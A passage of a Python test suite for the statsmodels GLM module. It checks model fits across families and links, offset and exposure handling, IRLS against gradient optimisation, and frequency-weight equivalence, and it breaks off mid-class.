    @classmethod
    def setup_class(cls):
        # Test Precisions
        cls.decimal_aic_R = -10 #TODO: Big difference vs R
        cls.decimal_fittedvalues = DECIMAL_3
        cls.decimal_params = DECIMAL_3
        from .results.results_glm import Medpar1
        data = Medpar1()
        with warnings.catch_warnings():
            # identity link for InverseGaussian emits a DomainWarning
            warnings.simplefilter("ignore")
            cls.res1 = GLM(data.endog, data.exog,
                           family=sm.families.InverseGaussian(
                               link=sm.families.links.identity())).fit()
        from .results.results_glm import InvGaussIdentity
        cls.res2 = InvGaussIdentity()
    # FIXME: enable or delete
    # def setup(cls):
    #     if skipR:
    #         raise SkipTest, "Rpy not installed."
    #     cls.res2 = RModel(cls.data.endog, cls.data.exog, r.glm,
    #         family=r.inverse_gaussian(link="identity"))
    #     cls.res2.null_deviance = 335.1539777981053 # from R, Rpy bug
    #     cls.res2.llf = -12163.25545 # from Stata, big diff with R
class TestGlmNegbinomial(CheckModelResultsMixin):
    @classmethod
    def setup_class(cls):
        '''
        Test Negative Binomial family with log link
        '''
        # Test Precision
        cls.decimal_resid = DECIMAL_1
        cls.decimal_params = DECIMAL_3
        cls.decimal_resids = -1  # 1 % mismatch at 0
        cls.decimal_fittedvalues = DECIMAL_1
        from statsmodels.datasets.committee import load
        cls.data = load(as_pandas=False)
        # log-transform column 2 and add its interaction with column 1,
        # matching the reference model specification
        cls.data.exog[:,2] = np.log(cls.data.exog[:,2])
        interaction = cls.data.exog[:,2]*cls.data.exog[:,1]
        cls.data.exog = np.column_stack((cls.data.exog,interaction))
        cls.data.exog = add_constant(cls.data.exog, prepend=False)
        with warnings.catch_warnings():
            warnings.simplefilter("ignore", category=DomainWarning)
            fam = sm.families.NegativeBinomial()
        # scale estimated via Pearson chi2 ('x2'), as in the reference
        cls.res1 = GLM(cls.data.endog, cls.data.exog,
                       family=fam).fit(scale='x2')
        from .results.results_glm import Committee
        res2 = Committee()
        res2.aic_R += 2  # They do not count a degree of freedom for the scale
        cls.res2 = res2
    # FIXME: enable or delete
    # def setup(self):
    #     if skipR:
    #         raise SkipTest, "Rpy not installed"
    #     r.library('MASS')  # this does not work when done in rmodelwrap?
    #     self.res2 = RModel(self.data.endog, self.data.exog, r.glm,
    #             family=r.negative_binomial(1))
    #     self.res2.null_deviance = 27.8110469364343
# FIXME: enable/xfail/skip or delete
#class TestGlmNegbinomial_log(CheckModelResultsMixin):
# pass
# FIXME: enable/xfail/skip or delete
#class TestGlmNegbinomial_power(CheckModelResultsMixin):
# pass
# FIXME: enable/xfail/skip or delete
#class TestGlmNegbinomial_nbinom(CheckModelResultsMixin):
# pass
class TestGlmPoissonOffset(CheckModelResultsMixin):
    # Poisson family with an exposure term; also covers missing-value
    # handling, the offset/exposure equivalence and predict() defaults.
    @classmethod
    def setup_class(cls):
        from .results.results_glm import Cpunish_offset
        cls.decimal_params = DECIMAL_4
        cls.decimal_bse = DECIMAL_4
        cls.decimal_aic_R = 3
        data = cpunish.load(as_pandas=False)
        data.exog[:, 3] = np.log(data.exog[:, 3])
        data.exog = add_constant(data.exog, prepend=True)
        # constant exposure of 100 for every observation
        exposure = [100] * len(data.endog)
        cls.data = data
        cls.exposure = exposure
        cls.res1 = GLM(data.endog, data.exog, family=sm.families.Poisson(),
                       exposure=exposure).fit()
        cls.res2 = Cpunish_offset()
    def test_missing(self):
        # make sure offset is dropped correctly
        endog = self.data.endog.copy()
        endog[[2,4,6,8]] = np.nan
        mod = GLM(endog, self.data.exog, family=sm.families.Poisson(),
                  exposure=self.exposure, missing='drop')
        # 17 observations minus the 4 set to NaN
        assert_equal(mod.exposure.shape[0], 13)
    def test_offset_exposure(self):
        # exposure=x and offset=log(x) should have the same effect
        np.random.seed(382304)
        endog = np.random.randint(0, 10, 100)
        exog = np.random.normal(size=(100,3))
        exposure = np.random.uniform(1, 2, 100)
        offset = np.random.uniform(1, 2, 100)
        mod1 = GLM(endog, exog, family=sm.families.Poisson(),
                   offset=offset, exposure=exposure).fit()
        offset2 = offset + np.log(exposure)
        mod2 = GLM(endog, exog, family=sm.families.Poisson(),
                   offset=offset2).fit()
        assert_almost_equal(mod1.params, mod2.params)
        assert_allclose(mod1.null, mod2.null, rtol=1e-10)
        # test recreating model
        mod1_ = mod1.model
        kwds = mod1_._get_init_kwds()
        assert_allclose(kwds['exposure'], exposure, rtol=1e-14)
        assert_allclose(kwds['offset'], mod1_.offset, rtol=1e-14)
        mod3 = mod1_.__class__(mod1_.endog, mod1_.exog, **kwds)
        assert_allclose(mod3.exposure, mod1_.exposure, rtol=1e-14)
        assert_allclose(mod3.offset, mod1_.offset, rtol=1e-14)
        # test fit_regularized exposure, see #4605
        resr1 = mod1.model.fit_regularized()
        resr2 = mod2.model.fit_regularized()
        assert_allclose(resr1.params, resr2.params, rtol=1e-10)
    def test_predict(self):
        np.random.seed(382304)
        endog = np.random.randint(0, 10, 100)
        exog = np.random.normal(size=(100,3))
        exposure = np.random.uniform(1, 2, 100)
        mod1 = GLM(endog, exog, family=sm.families.Poisson(),
                   exposure=exposure).fit()
        exog1 = np.random.normal(size=(10,3))
        exposure1 = np.random.uniform(1, 2, 10)
        # Doubling exposure time should double expected response
        pred1 = mod1.predict(exog=exog1, exposure=exposure1)
        pred2 = mod1.predict(exog=exog1, exposure=2*exposure1)
        assert_almost_equal(pred2, 2*pred1)
        # Check exposure defaults
        pred3 = mod1.predict()
        pred4 = mod1.predict(exposure=exposure)
        pred5 = mod1.predict(exog=exog, exposure=exposure)
        assert_almost_equal(pred3, pred4)
        assert_almost_equal(pred4, pred5)
        # Check offset defaults
        offset = np.random.uniform(1, 2, 100)
        mod2 = GLM(endog, exog, offset=offset, family=sm.families.Poisson()).fit()
        pred1 = mod2.predict()
        pred2 = mod2.predict(offset=offset)
        pred3 = mod2.predict(exog=exog, offset=offset)
        assert_almost_equal(pred1, pred2)
        assert_almost_equal(pred2, pred3)
        # Check that offset shifts the linear predictor
        mod3 = GLM(endog, exog, family=sm.families.Poisson()).fit()
        offset = np.random.uniform(1, 2, 10)
        pred1 = mod3.predict(exog=exog1, offset=offset, linear=True)
        pred2 = mod3.predict(exog=exog1, offset=2*offset, linear=True)
        assert_almost_equal(pred2, pred1+offset)
def test_perfect_pred():
    """Perfectly separable binary data must raise PerfectSeparationError."""
    cur_dir = os.path.dirname(os.path.abspath(__file__))
    iris_path = os.path.join(cur_dir, 'results', 'iris.csv')
    iris = np.genfromtxt(iris_path, delimiter=",", skip_header=1)
    # keep only the two linearly separable classes (labels 0 and 1)
    mask = iris[:, -1] != 2
    y = iris[mask, -1]
    X = add_constant(iris[mask, :-1], prepend=True)
    glm = GLM(y, X, family=sm.families.Binomial())
    with warnings.catch_warnings():
        warnings.simplefilter("ignore", category=RuntimeWarning)
        assert_raises(PerfectSeparationError, glm.fit)
def test_score_test_ols():
    # nicer example than Longley: OLS compare_lm_test and GLM score_test
    # must agree up to the df_resid-vs-nobs scale factor (see #1786)
    from statsmodels.regression.linear_model import OLS
    np.random.seed(5)
    nobs = 100
    sige = 0.5
    x = np.random.uniform(0, 1, size=(nobs, 5))
    x[:, 0] = 1
    beta = 1. / np.arange(1., x.shape[1] + 1)
    y = x.dot(beta) + sige * np.random.randn(nobs)
    res_full = OLS(y, x).fit()
    res_restricted = OLS(y, x[:, :-2]).fit()
    lm_ols = res_full.compare_lm_test(res_restricted, demean=False)
    res_glm = GLM(y, x[:, :-2], family=sm.families.Gaussian()).fit()
    lm_glm = res_glm.model.score_test(res_glm.params, exog_extra=x[:, -2:])
    # difference in df_resid versus nobs in scale see #1786
    assert_allclose(lm_ols[0] * 97 / 100., lm_glm[0], rtol=1e-13)
def test_attribute_writable_resettable():
    # Regression test for mutables and class constructors: mutating the
    # family/link of one model must not leak into a newly built model.
    data = sm.datasets.longley.load(as_pandas=False)
    endog, exog = data.endog, data.exog
    first_model = sm.GLM(endog, exog)
    assert_equal(first_model.family.link.power, 1.0)
    first_model.family.link.power = 2.
    assert_equal(first_model.family.link.power, 2.0)
    # a fresh model must come back with the default link power
    second_model = sm.GLM(endog, exog)
    assert_equal(second_model.family.link.power, 1.0)
class TestStartParams(CheckModelResultsMixin):
    # Same model as TestGlmGaussian, but fit with explicit start_params
    # taken from OLS — results must be unchanged.
    @classmethod
    def setup_class(cls):
        '''
        Test Gaussian family with canonical identity link
        '''
        # Test Precisions
        cls.decimal_resids = DECIMAL_3
        cls.decimal_params = DECIMAL_2
        cls.decimal_bic = DECIMAL_0
        cls.decimal_bse = DECIMAL_3
        from statsmodels.datasets.longley import load
        cls.data = load(as_pandas=False)
        cls.data.exog = add_constant(cls.data.exog, prepend=False)
        params = sm.OLS(cls.data.endog, cls.data.exog).fit().params
        cls.res1 = GLM(cls.data.endog, cls.data.exog,
                       family=sm.families.Gaussian()).fit(start_params=params)
        from .results.results_glm import Longley
        cls.res2 = Longley()
def test_glm_start_params():
    # see 1604: fit must converge from user-supplied start_params on a
    # badly scaled, weighted binary problem
    counts = np.array('0 1 0 0 0 1'.split(), int)
    weights = np.array([50, 1, 50, 1, 5, 10])
    y2 = np.repeat(counts, weights)
    x2 = np.repeat([0, 0, 0.001, 100, -1, -1], weights)
    mod = sm.GLM(y2, sm.add_constant(x2), family=sm.families.Binomial())
    res = mod.fit(start_params=[-4, -5])
    np.testing.assert_almost_equal(res.params, [-4.60305022, -5.29634545], 6)
def test_loglike_no_opt():
    # see 1728: with maxiter=0 the reported llf must equal the Bernoulli
    # log-likelihood evaluated exactly at start_params
    y = np.asarray([0, 1, 0, 0, 1, 1, 0, 1, 1, 1])
    x = np.arange(10, dtype=np.float64)

    def llf(params):
        # hand-computed logit log-likelihood
        lin_pred = params[0] + params[1] * x
        pr = 1 / (1 + np.exp(-lin_pred))
        return np.sum(y * np.log(pr) + (1 - y) * np.log(1 - pr))

    for params in [0, 0], [0, 1], [0.5, 0.5]:
        mod = sm.GLM(y, sm.add_constant(x), family=sm.families.Binomial())
        res = mod.fit(start_params=params, maxiter=0)
        assert_almost_equal(llf(params), res.llf)
def test_formula_missing_exposure():
    """Exposure handling in the formula interface (see GH#2083)."""
    import statsmodels.formula.api as smf

    d = {'Foo': [1, 2, 10, 149], 'Bar': [1, 2, 3, np.nan],
         'constant': [1] * 4, 'exposure': np.random.uniform(size=4),
         'x': [1, 3, 2, 1.5]}
    df = pd.DataFrame(d)

    family = sm.families.Gaussian(link=sm.families.links.log())
    mod = smf.glm("Foo ~ Bar", data=df, exposure=df.exposure, family=family)
    # Exposure must have been converted from a Series to an ndarray.
    assert_(type(mod.exposure) is np.ndarray, msg='Exposure is not ndarray')

    # A length-mismatched exposure must raise, in both interfaces.
    exposure = pd.Series(np.random.uniform(size=5))
    df.loc[3, 'Bar'] = 4  # the NaN is not relevant for the shape mismatch
    assert_raises(ValueError, smf.glm, "Foo ~ Bar", data=df,
                  exposure=exposure, family=family)
    assert_raises(ValueError, GLM, df.Foo, df[['constant', 'Bar']],
                  exposure=exposure, family=family)
@pytest.mark.matplotlib
def test_plots(close_figures):
    """Smoke test added-variable / partial-residual / CERES plots."""
    np.random.seed(378)
    n = 200
    exog = np.random.normal(size=(n, 2))
    lin_pred = exog[:, 0] + exog[:, 1]**2
    prob = 1 / (1 + np.exp(-lin_pred))
    endog = 1 * (np.random.uniform(size=n) < prob)

    model = sm.GLM(endog, exog, family=sm.families.Binomial())
    result = model.fit()

    import pandas as pd
    from statsmodels.graphics.regressionplots import add_lowess

    def smoke(res, key):
        # Exercise each diagnostic plot for one regressor (index or name).
        for plot in (res.plot_added_variable,
                     res.plot_partial_residuals,
                     res.plot_ceres_residuals):
            fig = plot(key)
            add_lowess(fig.axes[0], frac=0.5)
            close_or_save(pdf, fig)

    # array interface
    for j in 0, 1:
        smoke(result, j)

    # formula interface
    data = pd.DataFrame({"y": endog, "x1": exog[:, 0], "x2": exog[:, 1]})
    result = sm.GLM.from_formula("y ~ x1 + x2", data,
                                 family=sm.families.Binomial()).fit()
    for j in 0, 1:
        smoke(result, ["x1", "x2"][j])
def gen_endog(lin_pred, family_class, link, binom_version=0):
    """Simulate a response for ``family_class`` at linear predictor ``lin_pred``.

    For the Binomial family, ``binom_version=1`` returns a two-column
    (successes, failures) response with 10 trials per observation; otherwise
    a 0/1 outcome is drawn.  The seed is fixed so repeated calls reproduce
    the same data.
    """
    np.random.seed(872)
    fam = sm.families
    mu = link().inverse(lin_pred)
    nobs = len(lin_pred)

    if family_class == fam.Binomial:
        if binom_version == 0:
            return 1 * (np.random.uniform(size=nobs) < mu)
        # Two-column (successes, failures) layout with 10 trials per row.
        trials = 10
        y = np.empty((nobs, 2))
        y[:, 0] = (np.random.uniform(size=(nobs, trials))
                   < mu[:, None]).sum(1)
        y[:, 1] = trials - y[:, 0]
        return y
    if family_class == fam.Poisson:
        return np.random.poisson(mu)
    if family_class == fam.Gamma:
        return np.random.gamma(2, mu)
    if family_class == fam.Gaussian:
        return mu + 2 * np.random.normal(size=nobs)
    if family_class == fam.NegativeBinomial:
        from scipy.stats.distributions import nbinom
        # NOTE(review): mu is used as nbinom's ``n`` parameter here — the
        # data need not follow the family exactly for these smoke checks.
        return nbinom.rvs(mu, 0.5)
    if family_class == fam.InverseGaussian:
        from scipy.stats.distributions import invgauss
        return invgauss.rvs(mu, scale=20)
    raise ValueError
@pytest.mark.smoke
def test_summary():
    """summary() should build without error for IRLS and gradient fits."""
    np.random.seed(4323)
    nobs = 100
    exog = np.random.normal(size=(nobs, 2))
    exog[:, 0] = 1
    endog = np.random.normal(size=nobs)

    for method in ("irls", "cg"):
        fa = sm.families.Gaussian()
        rslt = sm.GLM(endog, exog, family=fa).fit(method=method)
        rslt.summary()
def check_score_hessian(results):
    """Check the model's analytic score and hessian against numerical ones."""
    params = results.params

    def loglike(p):
        return results.model.loglike(p, scale=1)

    # Evaluate the score slightly away from the MLE, where it is not ~0,
    # so a relative comparison is meaningful.
    # complex-step currently (0.9) does not work for all families.
    sc = results.model.score(params * 0.98, scale=1)
    sc_num = approx_fprime(params * 0.98, loglike)
    assert_allclose(sc, sc_num, rtol=0.05)

    hess = results.model.hessian(params, scale=1)
    hess_num = approx_hess(params, loglike)
    assert_allclose(hess, hess_num, rtol=0.05)

    # The hessian must also match the numerical derivative of the score.
    def score(p):
        return results.model.score(p, scale=1)

    hess_from_score = approx_fprime(params, score)
    assert_allclose(hess, hess_from_score, rtol=0.05)
def test_gradient_irls():
    # Compare the results when using gradient optimization and IRLS.
    # For each (family, link) pair: fit by IRLS, then refit with the Newton
    # optimizer (with and without an IRLS warm-start) and require matching
    # params, llf, scale and standard errors.
    # TODO: Find working examples for inverse_squared link
    np.random.seed(87342)
    fam = sm.families
    lnk = sm.families.links
    families = [(fam.Binomial, [lnk.logit, lnk.probit, lnk.cloglog, lnk.log, lnk.cauchy]),
                (fam.Poisson, [lnk.log, lnk.identity, lnk.sqrt]),
                (fam.Gamma, [lnk.log, lnk.identity, lnk.inverse_power]),
                (fam.Gaussian, [lnk.identity, lnk.log, lnk.inverse_power]),
                (fam.InverseGaussian, [lnk.log, lnk.identity, lnk.inverse_power, lnk.inverse_squared]),
                (fam.NegativeBinomial, [lnk.log, lnk.inverse_power, lnk.inverse_squared, lnk.identity])]
    n = 100
    p = 3
    exog = np.random.normal(size=(n, p))
    exog[:, 0] = 1
    skip_one = False
    for family_class, family_links in families:
        for link in family_links:
            for binom_version in 0,1:
                # The two-column Binomial layout only applies to Binomial.
                if family_class != fam.Binomial and binom_version == 1:
                    continue
                # Pick a linear predictor that keeps the mean in the valid
                # range for this (family, link) pair; a few known
                # non-convergent combinations are skipped via ``continue``.
                if (family_class, link) == (fam.Poisson, lnk.identity):
                    lin_pred = 20 + exog.sum(1)
                elif (family_class, link) == (fam.Binomial, lnk.log):
                    lin_pred = -1 + exog.sum(1) / 8
                elif (family_class, link) == (fam.Poisson, lnk.sqrt):
                    lin_pred = 2 + exog.sum(1)
                elif (family_class, link) == (fam.InverseGaussian, lnk.log):
                    #skip_zero = True
                    lin_pred = -1 + exog.sum(1)
                elif (family_class, link) == (fam.InverseGaussian, lnk.identity):
                    lin_pred = 20 + 5*exog.sum(1)
                    lin_pred = np.clip(lin_pred, 1e-4, np.inf)
                elif (family_class, link) == (fam.InverseGaussian, lnk.inverse_squared):
                    lin_pred = 0.5 + exog.sum(1) / 5
                    continue # skip due to non-convergence
                elif (family_class, link) == (fam.InverseGaussian, lnk.inverse_power):
                    lin_pred = 1 + exog.sum(1) / 5
                elif (family_class, link) == (fam.NegativeBinomial, lnk.identity):
                    lin_pred = 20 + 5*exog.sum(1)
                    lin_pred = np.clip(lin_pred, 1e-4, np.inf)
                elif (family_class, link) == (fam.NegativeBinomial, lnk.inverse_squared):
                    lin_pred = 0.1 + np.random.uniform(size=exog.shape[0])
                    continue # skip due to non-convergence
                elif (family_class, link) == (fam.NegativeBinomial, lnk.inverse_power):
                    lin_pred = 1 + exog.sum(1) / 5
                elif (family_class, link) == (fam.Gaussian, lnk.inverse_power):
                    # adding skip because of convergence failure
                    # NOTE(review): this branch does not assign lin_pred, so
                    # the value from the previous iteration is reused below —
                    # confirm this is intentional.
                    skip_one = True
                # the following fails with identity link, because endog < 0
                # elif family_class == fam.Gamma:
                #     lin_pred = 0.5 * exog.sum(1) + np.random.uniform(size=exog.shape[0])
                else:
                    lin_pred = np.random.uniform(size=exog.shape[0])

                endog = gen_endog(lin_pred, family_class, link, binom_version)
                with warnings.catch_warnings():
                    warnings.simplefilter("ignore")
                    mod_irls = sm.GLM(endog, exog, family=family_class(link=link()))
                    rslt_irls = mod_irls.fit(method="IRLS")

                # A few combinations are excluded from the numerical
                # score/hessian cross-check.
                if not (family_class, link) in [(fam.Poisson, lnk.sqrt),
                                                (fam.Gamma, lnk.inverse_power),
                                                (fam.InverseGaussian, lnk.identity)
                                                ]:
                    check_score_hessian(rslt_irls)

                # Try with and without starting values.
                for max_start_irls, start_params in (0, rslt_irls.params), (3, None):
                    # TODO: skip convergence failures for now
                    if max_start_irls > 0 and skip_one:
                        continue
                    with warnings.catch_warnings():
                        warnings.simplefilter("ignore")
                        mod_gradient = sm.GLM(endog, exog, family=family_class(link=link()))
                        rslt_gradient = mod_gradient.fit(max_start_irls=max_start_irls,
                                                         start_params=start_params,
                                                         method="newton", maxiter=300)

                    assert_allclose(rslt_gradient.params,
                                    rslt_irls.params, rtol=1e-6, atol=5e-5)
                    assert_allclose(rslt_gradient.llf, rslt_irls.llf,
                                    rtol=1e-6, atol=1e-6)
                    assert_allclose(rslt_gradient.scale, rslt_irls.scale,
                                    rtol=1e-6, atol=1e-6)
                    # Get the standard errors using expected information.
                    # NOTE(review): this first assignment is immediately
                    # overwritten by the eim-based bse below.
                    gradient_bse = rslt_gradient.bse
                    ehess = mod_gradient.hessian(rslt_gradient.params, observed=False)
                    gradient_bse = np.sqrt(-np.diag(np.linalg.inv(ehess)))
                    assert_allclose(gradient_bse, rslt_irls.bse, rtol=1e-6, atol=5e-5)
                    # rslt_irls.bse corresponds to observed=True
                    assert_allclose(rslt_gradient.bse, rslt_irls.bse, rtol=0.2, atol=5e-5)

                    rslt_gradient_eim = mod_gradient.fit(max_start_irls=0,
                                                         cov_type='eim',
                                                         start_params=rslt_gradient.params,
                                                         method="newton", maxiter=300)
                    assert_allclose(rslt_gradient_eim.bse, rslt_irls.bse, rtol=5e-5, atol=0)
def test_gradient_irls_eim():
    # Compare the results when using eim gradient optimization and IRLS.
    # Same structure as test_gradient_irls, but the Newton fit uses the
    # expected information matrix (optim_hessian='eim').
    # TODO: Find working examples for inverse_squared link
    np.random.seed(87342)
    fam = sm.families
    lnk = sm.families.links
    families = [(fam.Binomial, [lnk.logit, lnk.probit, lnk.cloglog, lnk.log,
                                lnk.cauchy]),
                (fam.Poisson, [lnk.log, lnk.identity, lnk.sqrt]),
                (fam.Gamma, [lnk.log, lnk.identity, lnk.inverse_power]),
                (fam.Gaussian, [lnk.identity, lnk.log, lnk.inverse_power]),
                (fam.InverseGaussian, [lnk.log, lnk.identity,
                                       lnk.inverse_power,
                                       lnk.inverse_squared]),
                (fam.NegativeBinomial, [lnk.log, lnk.inverse_power,
                                        lnk.inverse_squared, lnk.identity])]
    n = 100
    p = 3
    exog = np.random.normal(size=(n, p))
    exog[:, 0] = 1
    skip_one = False
    for family_class, family_links in families:
        for link in family_links:
            for binom_version in 0, 1:
                # The two-column Binomial layout only applies to Binomial.
                if family_class != fam.Binomial and binom_version == 1:
                    continue
                # Pick a linear predictor that keeps the mean in the valid
                # range for this (family, link) pair; a few known
                # non-convergent combinations are skipped via ``continue``.
                if (family_class, link) == (fam.Poisson, lnk.identity):
                    lin_pred = 20 + exog.sum(1)
                elif (family_class, link) == (fam.Binomial, lnk.log):
                    lin_pred = -1 + exog.sum(1) / 8
                elif (family_class, link) == (fam.Poisson, lnk.sqrt):
                    lin_pred = 2 + exog.sum(1)
                elif (family_class, link) == (fam.InverseGaussian, lnk.log):
                    # skip_zero = True
                    lin_pred = -1 + exog.sum(1)
                elif (family_class, link) == (fam.InverseGaussian,
                                              lnk.identity):
                    lin_pred = 20 + 5*exog.sum(1)
                    lin_pred = np.clip(lin_pred, 1e-4, np.inf)
                elif (family_class, link) == (fam.InverseGaussian,
                                              lnk.inverse_squared):
                    lin_pred = 0.5 + exog.sum(1) / 5
                    continue  # skip due to non-convergence
                elif (family_class, link) == (fam.InverseGaussian,
                                              lnk.inverse_power):
                    lin_pred = 1 + exog.sum(1) / 5
                elif (family_class, link) == (fam.NegativeBinomial,
                                              lnk.identity):
                    lin_pred = 20 + 5*exog.sum(1)
                    lin_pred = np.clip(lin_pred, 1e-4, np.inf)
                elif (family_class, link) == (fam.NegativeBinomial,
                                              lnk.inverse_squared):
                    lin_pred = 0.1 + np.random.uniform(size=exog.shape[0])
                    continue  # skip due to non-convergence
                elif (family_class, link) == (fam.NegativeBinomial,
                                              lnk.inverse_power):
                    lin_pred = 1 + exog.sum(1) / 5
                elif (family_class, link) == (fam.Gaussian, lnk.inverse_power):
                    # adding skip because of convergence failure
                    # NOTE(review): lin_pred is not assigned here, so the
                    # value from the previous iteration is reused below.
                    skip_one = True
                else:
                    lin_pred = np.random.uniform(size=exog.shape[0])

                endog = gen_endog(lin_pred, family_class, link, binom_version)
                with warnings.catch_warnings():
                    warnings.simplefilter("ignore")
                    mod_irls = sm.GLM(endog, exog,
                                      family=family_class(link=link()))
                    rslt_irls = mod_irls.fit(method="IRLS")

                # Try with and without starting values.
                for max_start_irls, start_params in ((0, rslt_irls.params),
                                                     (3, None)):
                    # TODO: skip convergence failures for now
                    if max_start_irls > 0 and skip_one:
                        continue
                    with warnings.catch_warnings():
                        warnings.simplefilter("ignore")
                        mod_gradient = sm.GLM(endog, exog,
                                              family=family_class(link=link()))
                        rslt_gradient = mod_gradient.fit(
                            max_start_irls=max_start_irls,
                            start_params=start_params,
                            method="newton",
                            optim_hessian='eim'
                        )

                    assert_allclose(rslt_gradient.params, rslt_irls.params,
                                    rtol=1e-6, atol=5e-5)
                    assert_allclose(rslt_gradient.llf, rslt_irls.llf,
                                    rtol=1e-6, atol=1e-6)
                    assert_allclose(rslt_gradient.scale, rslt_irls.scale,
                                    rtol=1e-6, atol=1e-6)
                    # Get the standard errors using expected information.
                    ehess = mod_gradient.hessian(rslt_gradient.params,
                                                 observed=False)
                    gradient_bse = np.sqrt(-np.diag(np.linalg.inv(ehess)))
                    assert_allclose(gradient_bse, rslt_irls.bse, rtol=1e-6,
                                    atol=5e-5)
def test_glm_irls_method():
    """mle_settings / method must record the optimizer and wls_method used."""
    nobs, k_vars = 50, 4
    np.random.seed(987126)
    x = np.random.randn(nobs, k_vars - 1)
    exog = add_constant(x, has_constant='add')
    endog = exog.sum(1) + np.random.randn(nobs)

    mod = GLM(endog, exog)
    res_default = mod.fit()
    res_pinv = mod.fit(wls_method='pinv', attach_wls=True)
    res_qr = mod.fit(wls_method='qr', attach_wls=True)
    # fit_gradient does not attach mle_settings
    res_bfgs = mod.fit(start_params=res_default.params, method='bfgs')

    for res in (res_default, res_pinv, res_qr):
        assert_equal(res.mle_settings['optimizer'], 'IRLS')
        assert_equal(res.method, 'IRLS')

    assert_equal(res_default.mle_settings['wls_method'], 'lstsq')
    assert_equal(res_pinv.mle_settings['wls_method'], 'pinv')
    assert_equal(res_qr.mle_settings['wls_method'], 'qr')
    assert_(hasattr(res_pinv.results_wls.model, 'pinv_wexog'))
    assert_(hasattr(res_qr.results_wls.model, 'exog_Q'))

    # fit_gradient currently does not attach mle_settings
    assert_equal(res_bfgs.method, 'bfgs')
class CheckWtdDuplicationMixin(object):
    """Mixin comparing two equivalent fits of the same model.

    ``res1`` is fit with ``freq_weights``; ``res2`` is fit on data where each
    row is physically repeated ``weight`` times.  All reported statistics
    must agree between the two parameterizations.
    """
    decimal_params = DECIMAL_4

    @classmethod
    def setup_class(cls):
        cls.data = cpunish.load(as_pandas=False)
        cls.endog = cls.data.endog
        cls.exog = cls.data.exog
        np.random.seed(1234)
        cls.weight = np.random.randint(5, 100, len(cls.endog))
        # Row-duplicated version of the data, equivalent to freq_weights.
        cls.endog_big = np.repeat(cls.endog, cls.weight)
        cls.exog_big = np.repeat(cls.exog, cls.weight, axis=0)

    def test_params(self):
        assert_allclose(self.res1.params, self.res2.params, atol=1e-6,
                        rtol=1e-6)

    decimal_bse = DECIMAL_4

    def test_standard_errors(self):
        assert_allclose(self.res1.bse, self.res2.bse, rtol=1e-5, atol=1e-6)

    decimal_resids = DECIMAL_4

    # TODO: This does not work... Arrays are of different shape.
    # Perhaps we use self.res1.model.family.resid_XXX()?
    # NOTE: fixed a res1 -> res2 copy-paste typo in the first column of
    # resids2 below so the comparison is meaningful if ever re-enabled.
    """
    def test_residuals(self):
        resids1 = np.column_stack((self.res1.resid_pearson,
                                   self.res1.resid_deviance,
                                   self.res1.resid_working,
                                   self.res1.resid_anscombe,
                                   self.res1.resid_response))
        resids2 = np.column_stack((self.res2.resid_pearson,
                                   self.res2.resid_deviance,
                                   self.res2.resid_working,
                                   self.res2.resid_anscombe,
                                   self.res2.resid_response))
        assert_allclose(resids1, resids2, self.decimal_resids)
    """

    def test_aic(self):
        # R includes the estimation of the scale as a lost dof
        # Does not with Gamma though
        assert_allclose(self.res1.aic, self.res2.aic, atol=1e-6, rtol=1e-6)

    def test_deviance(self):
        assert_allclose(self.res1.deviance, self.res2.deviance, atol=1e-6,
                        rtol=1e-6)

    def test_scale(self):
        assert_allclose(self.res1.scale, self.res2.scale, atol=1e-6, rtol=1e-6)

    def test_loglike(self):
        # Stata uses the below llf for these families
        # We differ with R for them
        assert_allclose(self.res1.llf, self.res2.llf, 1e-6)

    decimal_null_deviance = DECIMAL_4

    def test_null_deviance(self):
        assert_allclose(self.res1.null_deviance, self.res2.null_deviance,
                        atol=1e-6, rtol=1e-6)

    decimal_bic = DECIMAL_4

    def test_bic(self):
        assert_allclose(self.res1.bic, self.res2.bic, atol=1e-6, rtol=1e-6)

    decimal_fittedvalues = DECIMAL_4

    def test_fittedvalues(self):
        res2_fitted = self.res2.predict(self.res1.model.exog)
        assert_allclose(self.res1.fittedvalues, res2_fitted, atol=1e-5,
                        rtol=1e-5)

    decimal_tpvalues = DECIMAL_4

    def test_tpvalues(self):
        # test comparing tvalues and pvalues with normal implementation
        # make sure they use normal distribution (inherited in results class)
        assert_allclose(self.res1.tvalues, self.res2.tvalues, atol=1e-6,
                        rtol=2e-4)
        assert_allclose(self.res1.pvalues, self.res2.pvalues, atol=1e-6,
                        rtol=1e-6)
        assert_allclose(self.res1.conf_int(), self.res2.conf_int(), atol=1e-6,
                        rtol=1e-6)
class TestWtdGlmPoisson(CheckWtdDuplicationMixin):
    @classmethod
    def setup_class(cls):
        """Poisson family with canonical log link."""
        super(TestWtdGlmPoisson, cls).setup_class()
        cls.res1 = GLM(cls.endog, cls.exog, freq_weights=cls.weight,
                       family=sm.families.Poisson()).fit()
        cls.res2 = GLM(cls.endog_big, cls.exog_big,
                       family=sm.families.Poisson()).fit()
class TestWtdGlmPoissonNewton(CheckWtdDuplicationMixin):
    @classmethod
    def setup_class(cls):
        """Poisson family with canonical log link, Newton optimizer."""
        super(TestWtdGlmPoissonNewton, cls).setup_class()
        # Known solution, used to warm-start the duplicated-data fit.
        start_params = np.array([1.82794424e-04, -4.76785037e-02,
                                 -9.48249717e-02, -2.92293226e-04,
                                 2.63728909e+00, -2.05934384e+01])
        cls.res1 = GLM(cls.endog, cls.exog, freq_weights=cls.weight,
                       family=sm.families.Poisson()).fit(method='newton')
        cls.res2 = GLM(cls.endog_big, cls.exog_big,
                       family=sm.families.Poisson()).fit(
                           method='newton', start_params=start_params)
class TestWtdGlmPoissonHC0(CheckWtdDuplicationMixin):
    @classmethod
    def setup_class(cls):
        """Poisson family with canonical log link, HC0 robust covariance."""
        super(TestWtdGlmPoissonHC0, cls).setup_class()
        # Known solution, used to warm-start the duplicated-data fit.
        start_params = np.array([1.82794424e-04, -4.76785037e-02,
                                 -9.48249717e-02, -2.92293226e-04,
                                 2.63728909e+00, -2.05934384e+01])
        cls.res1 = GLM(cls.endog, cls.exog, freq_weights=cls.weight,
                       family=sm.families.Poisson()).fit(cov_type='HC0')
        cls.res2 = GLM(cls.endog_big, cls.exog_big,
                       family=sm.families.Poisson()).fit(
                           cov_type='HC0', start_params=start_params)
class TestWtdGlmPoissonClu(CheckWtdDuplicationMixin):
    @classmethod
    def setup_class(cls):
        """Poisson family with canonical log link, cluster-robust covariance."""
        super(TestWtdGlmPoissonClu, cls).setup_class()
        start_params = np.array([1.82794424e-04, -4.76785037e-02,
                                 -9.48249717e-02, -2.92293226e-04,
                                 2.63728909e+00, -2.05934384e+01])

        # Pair up consecutive observations into clusters.
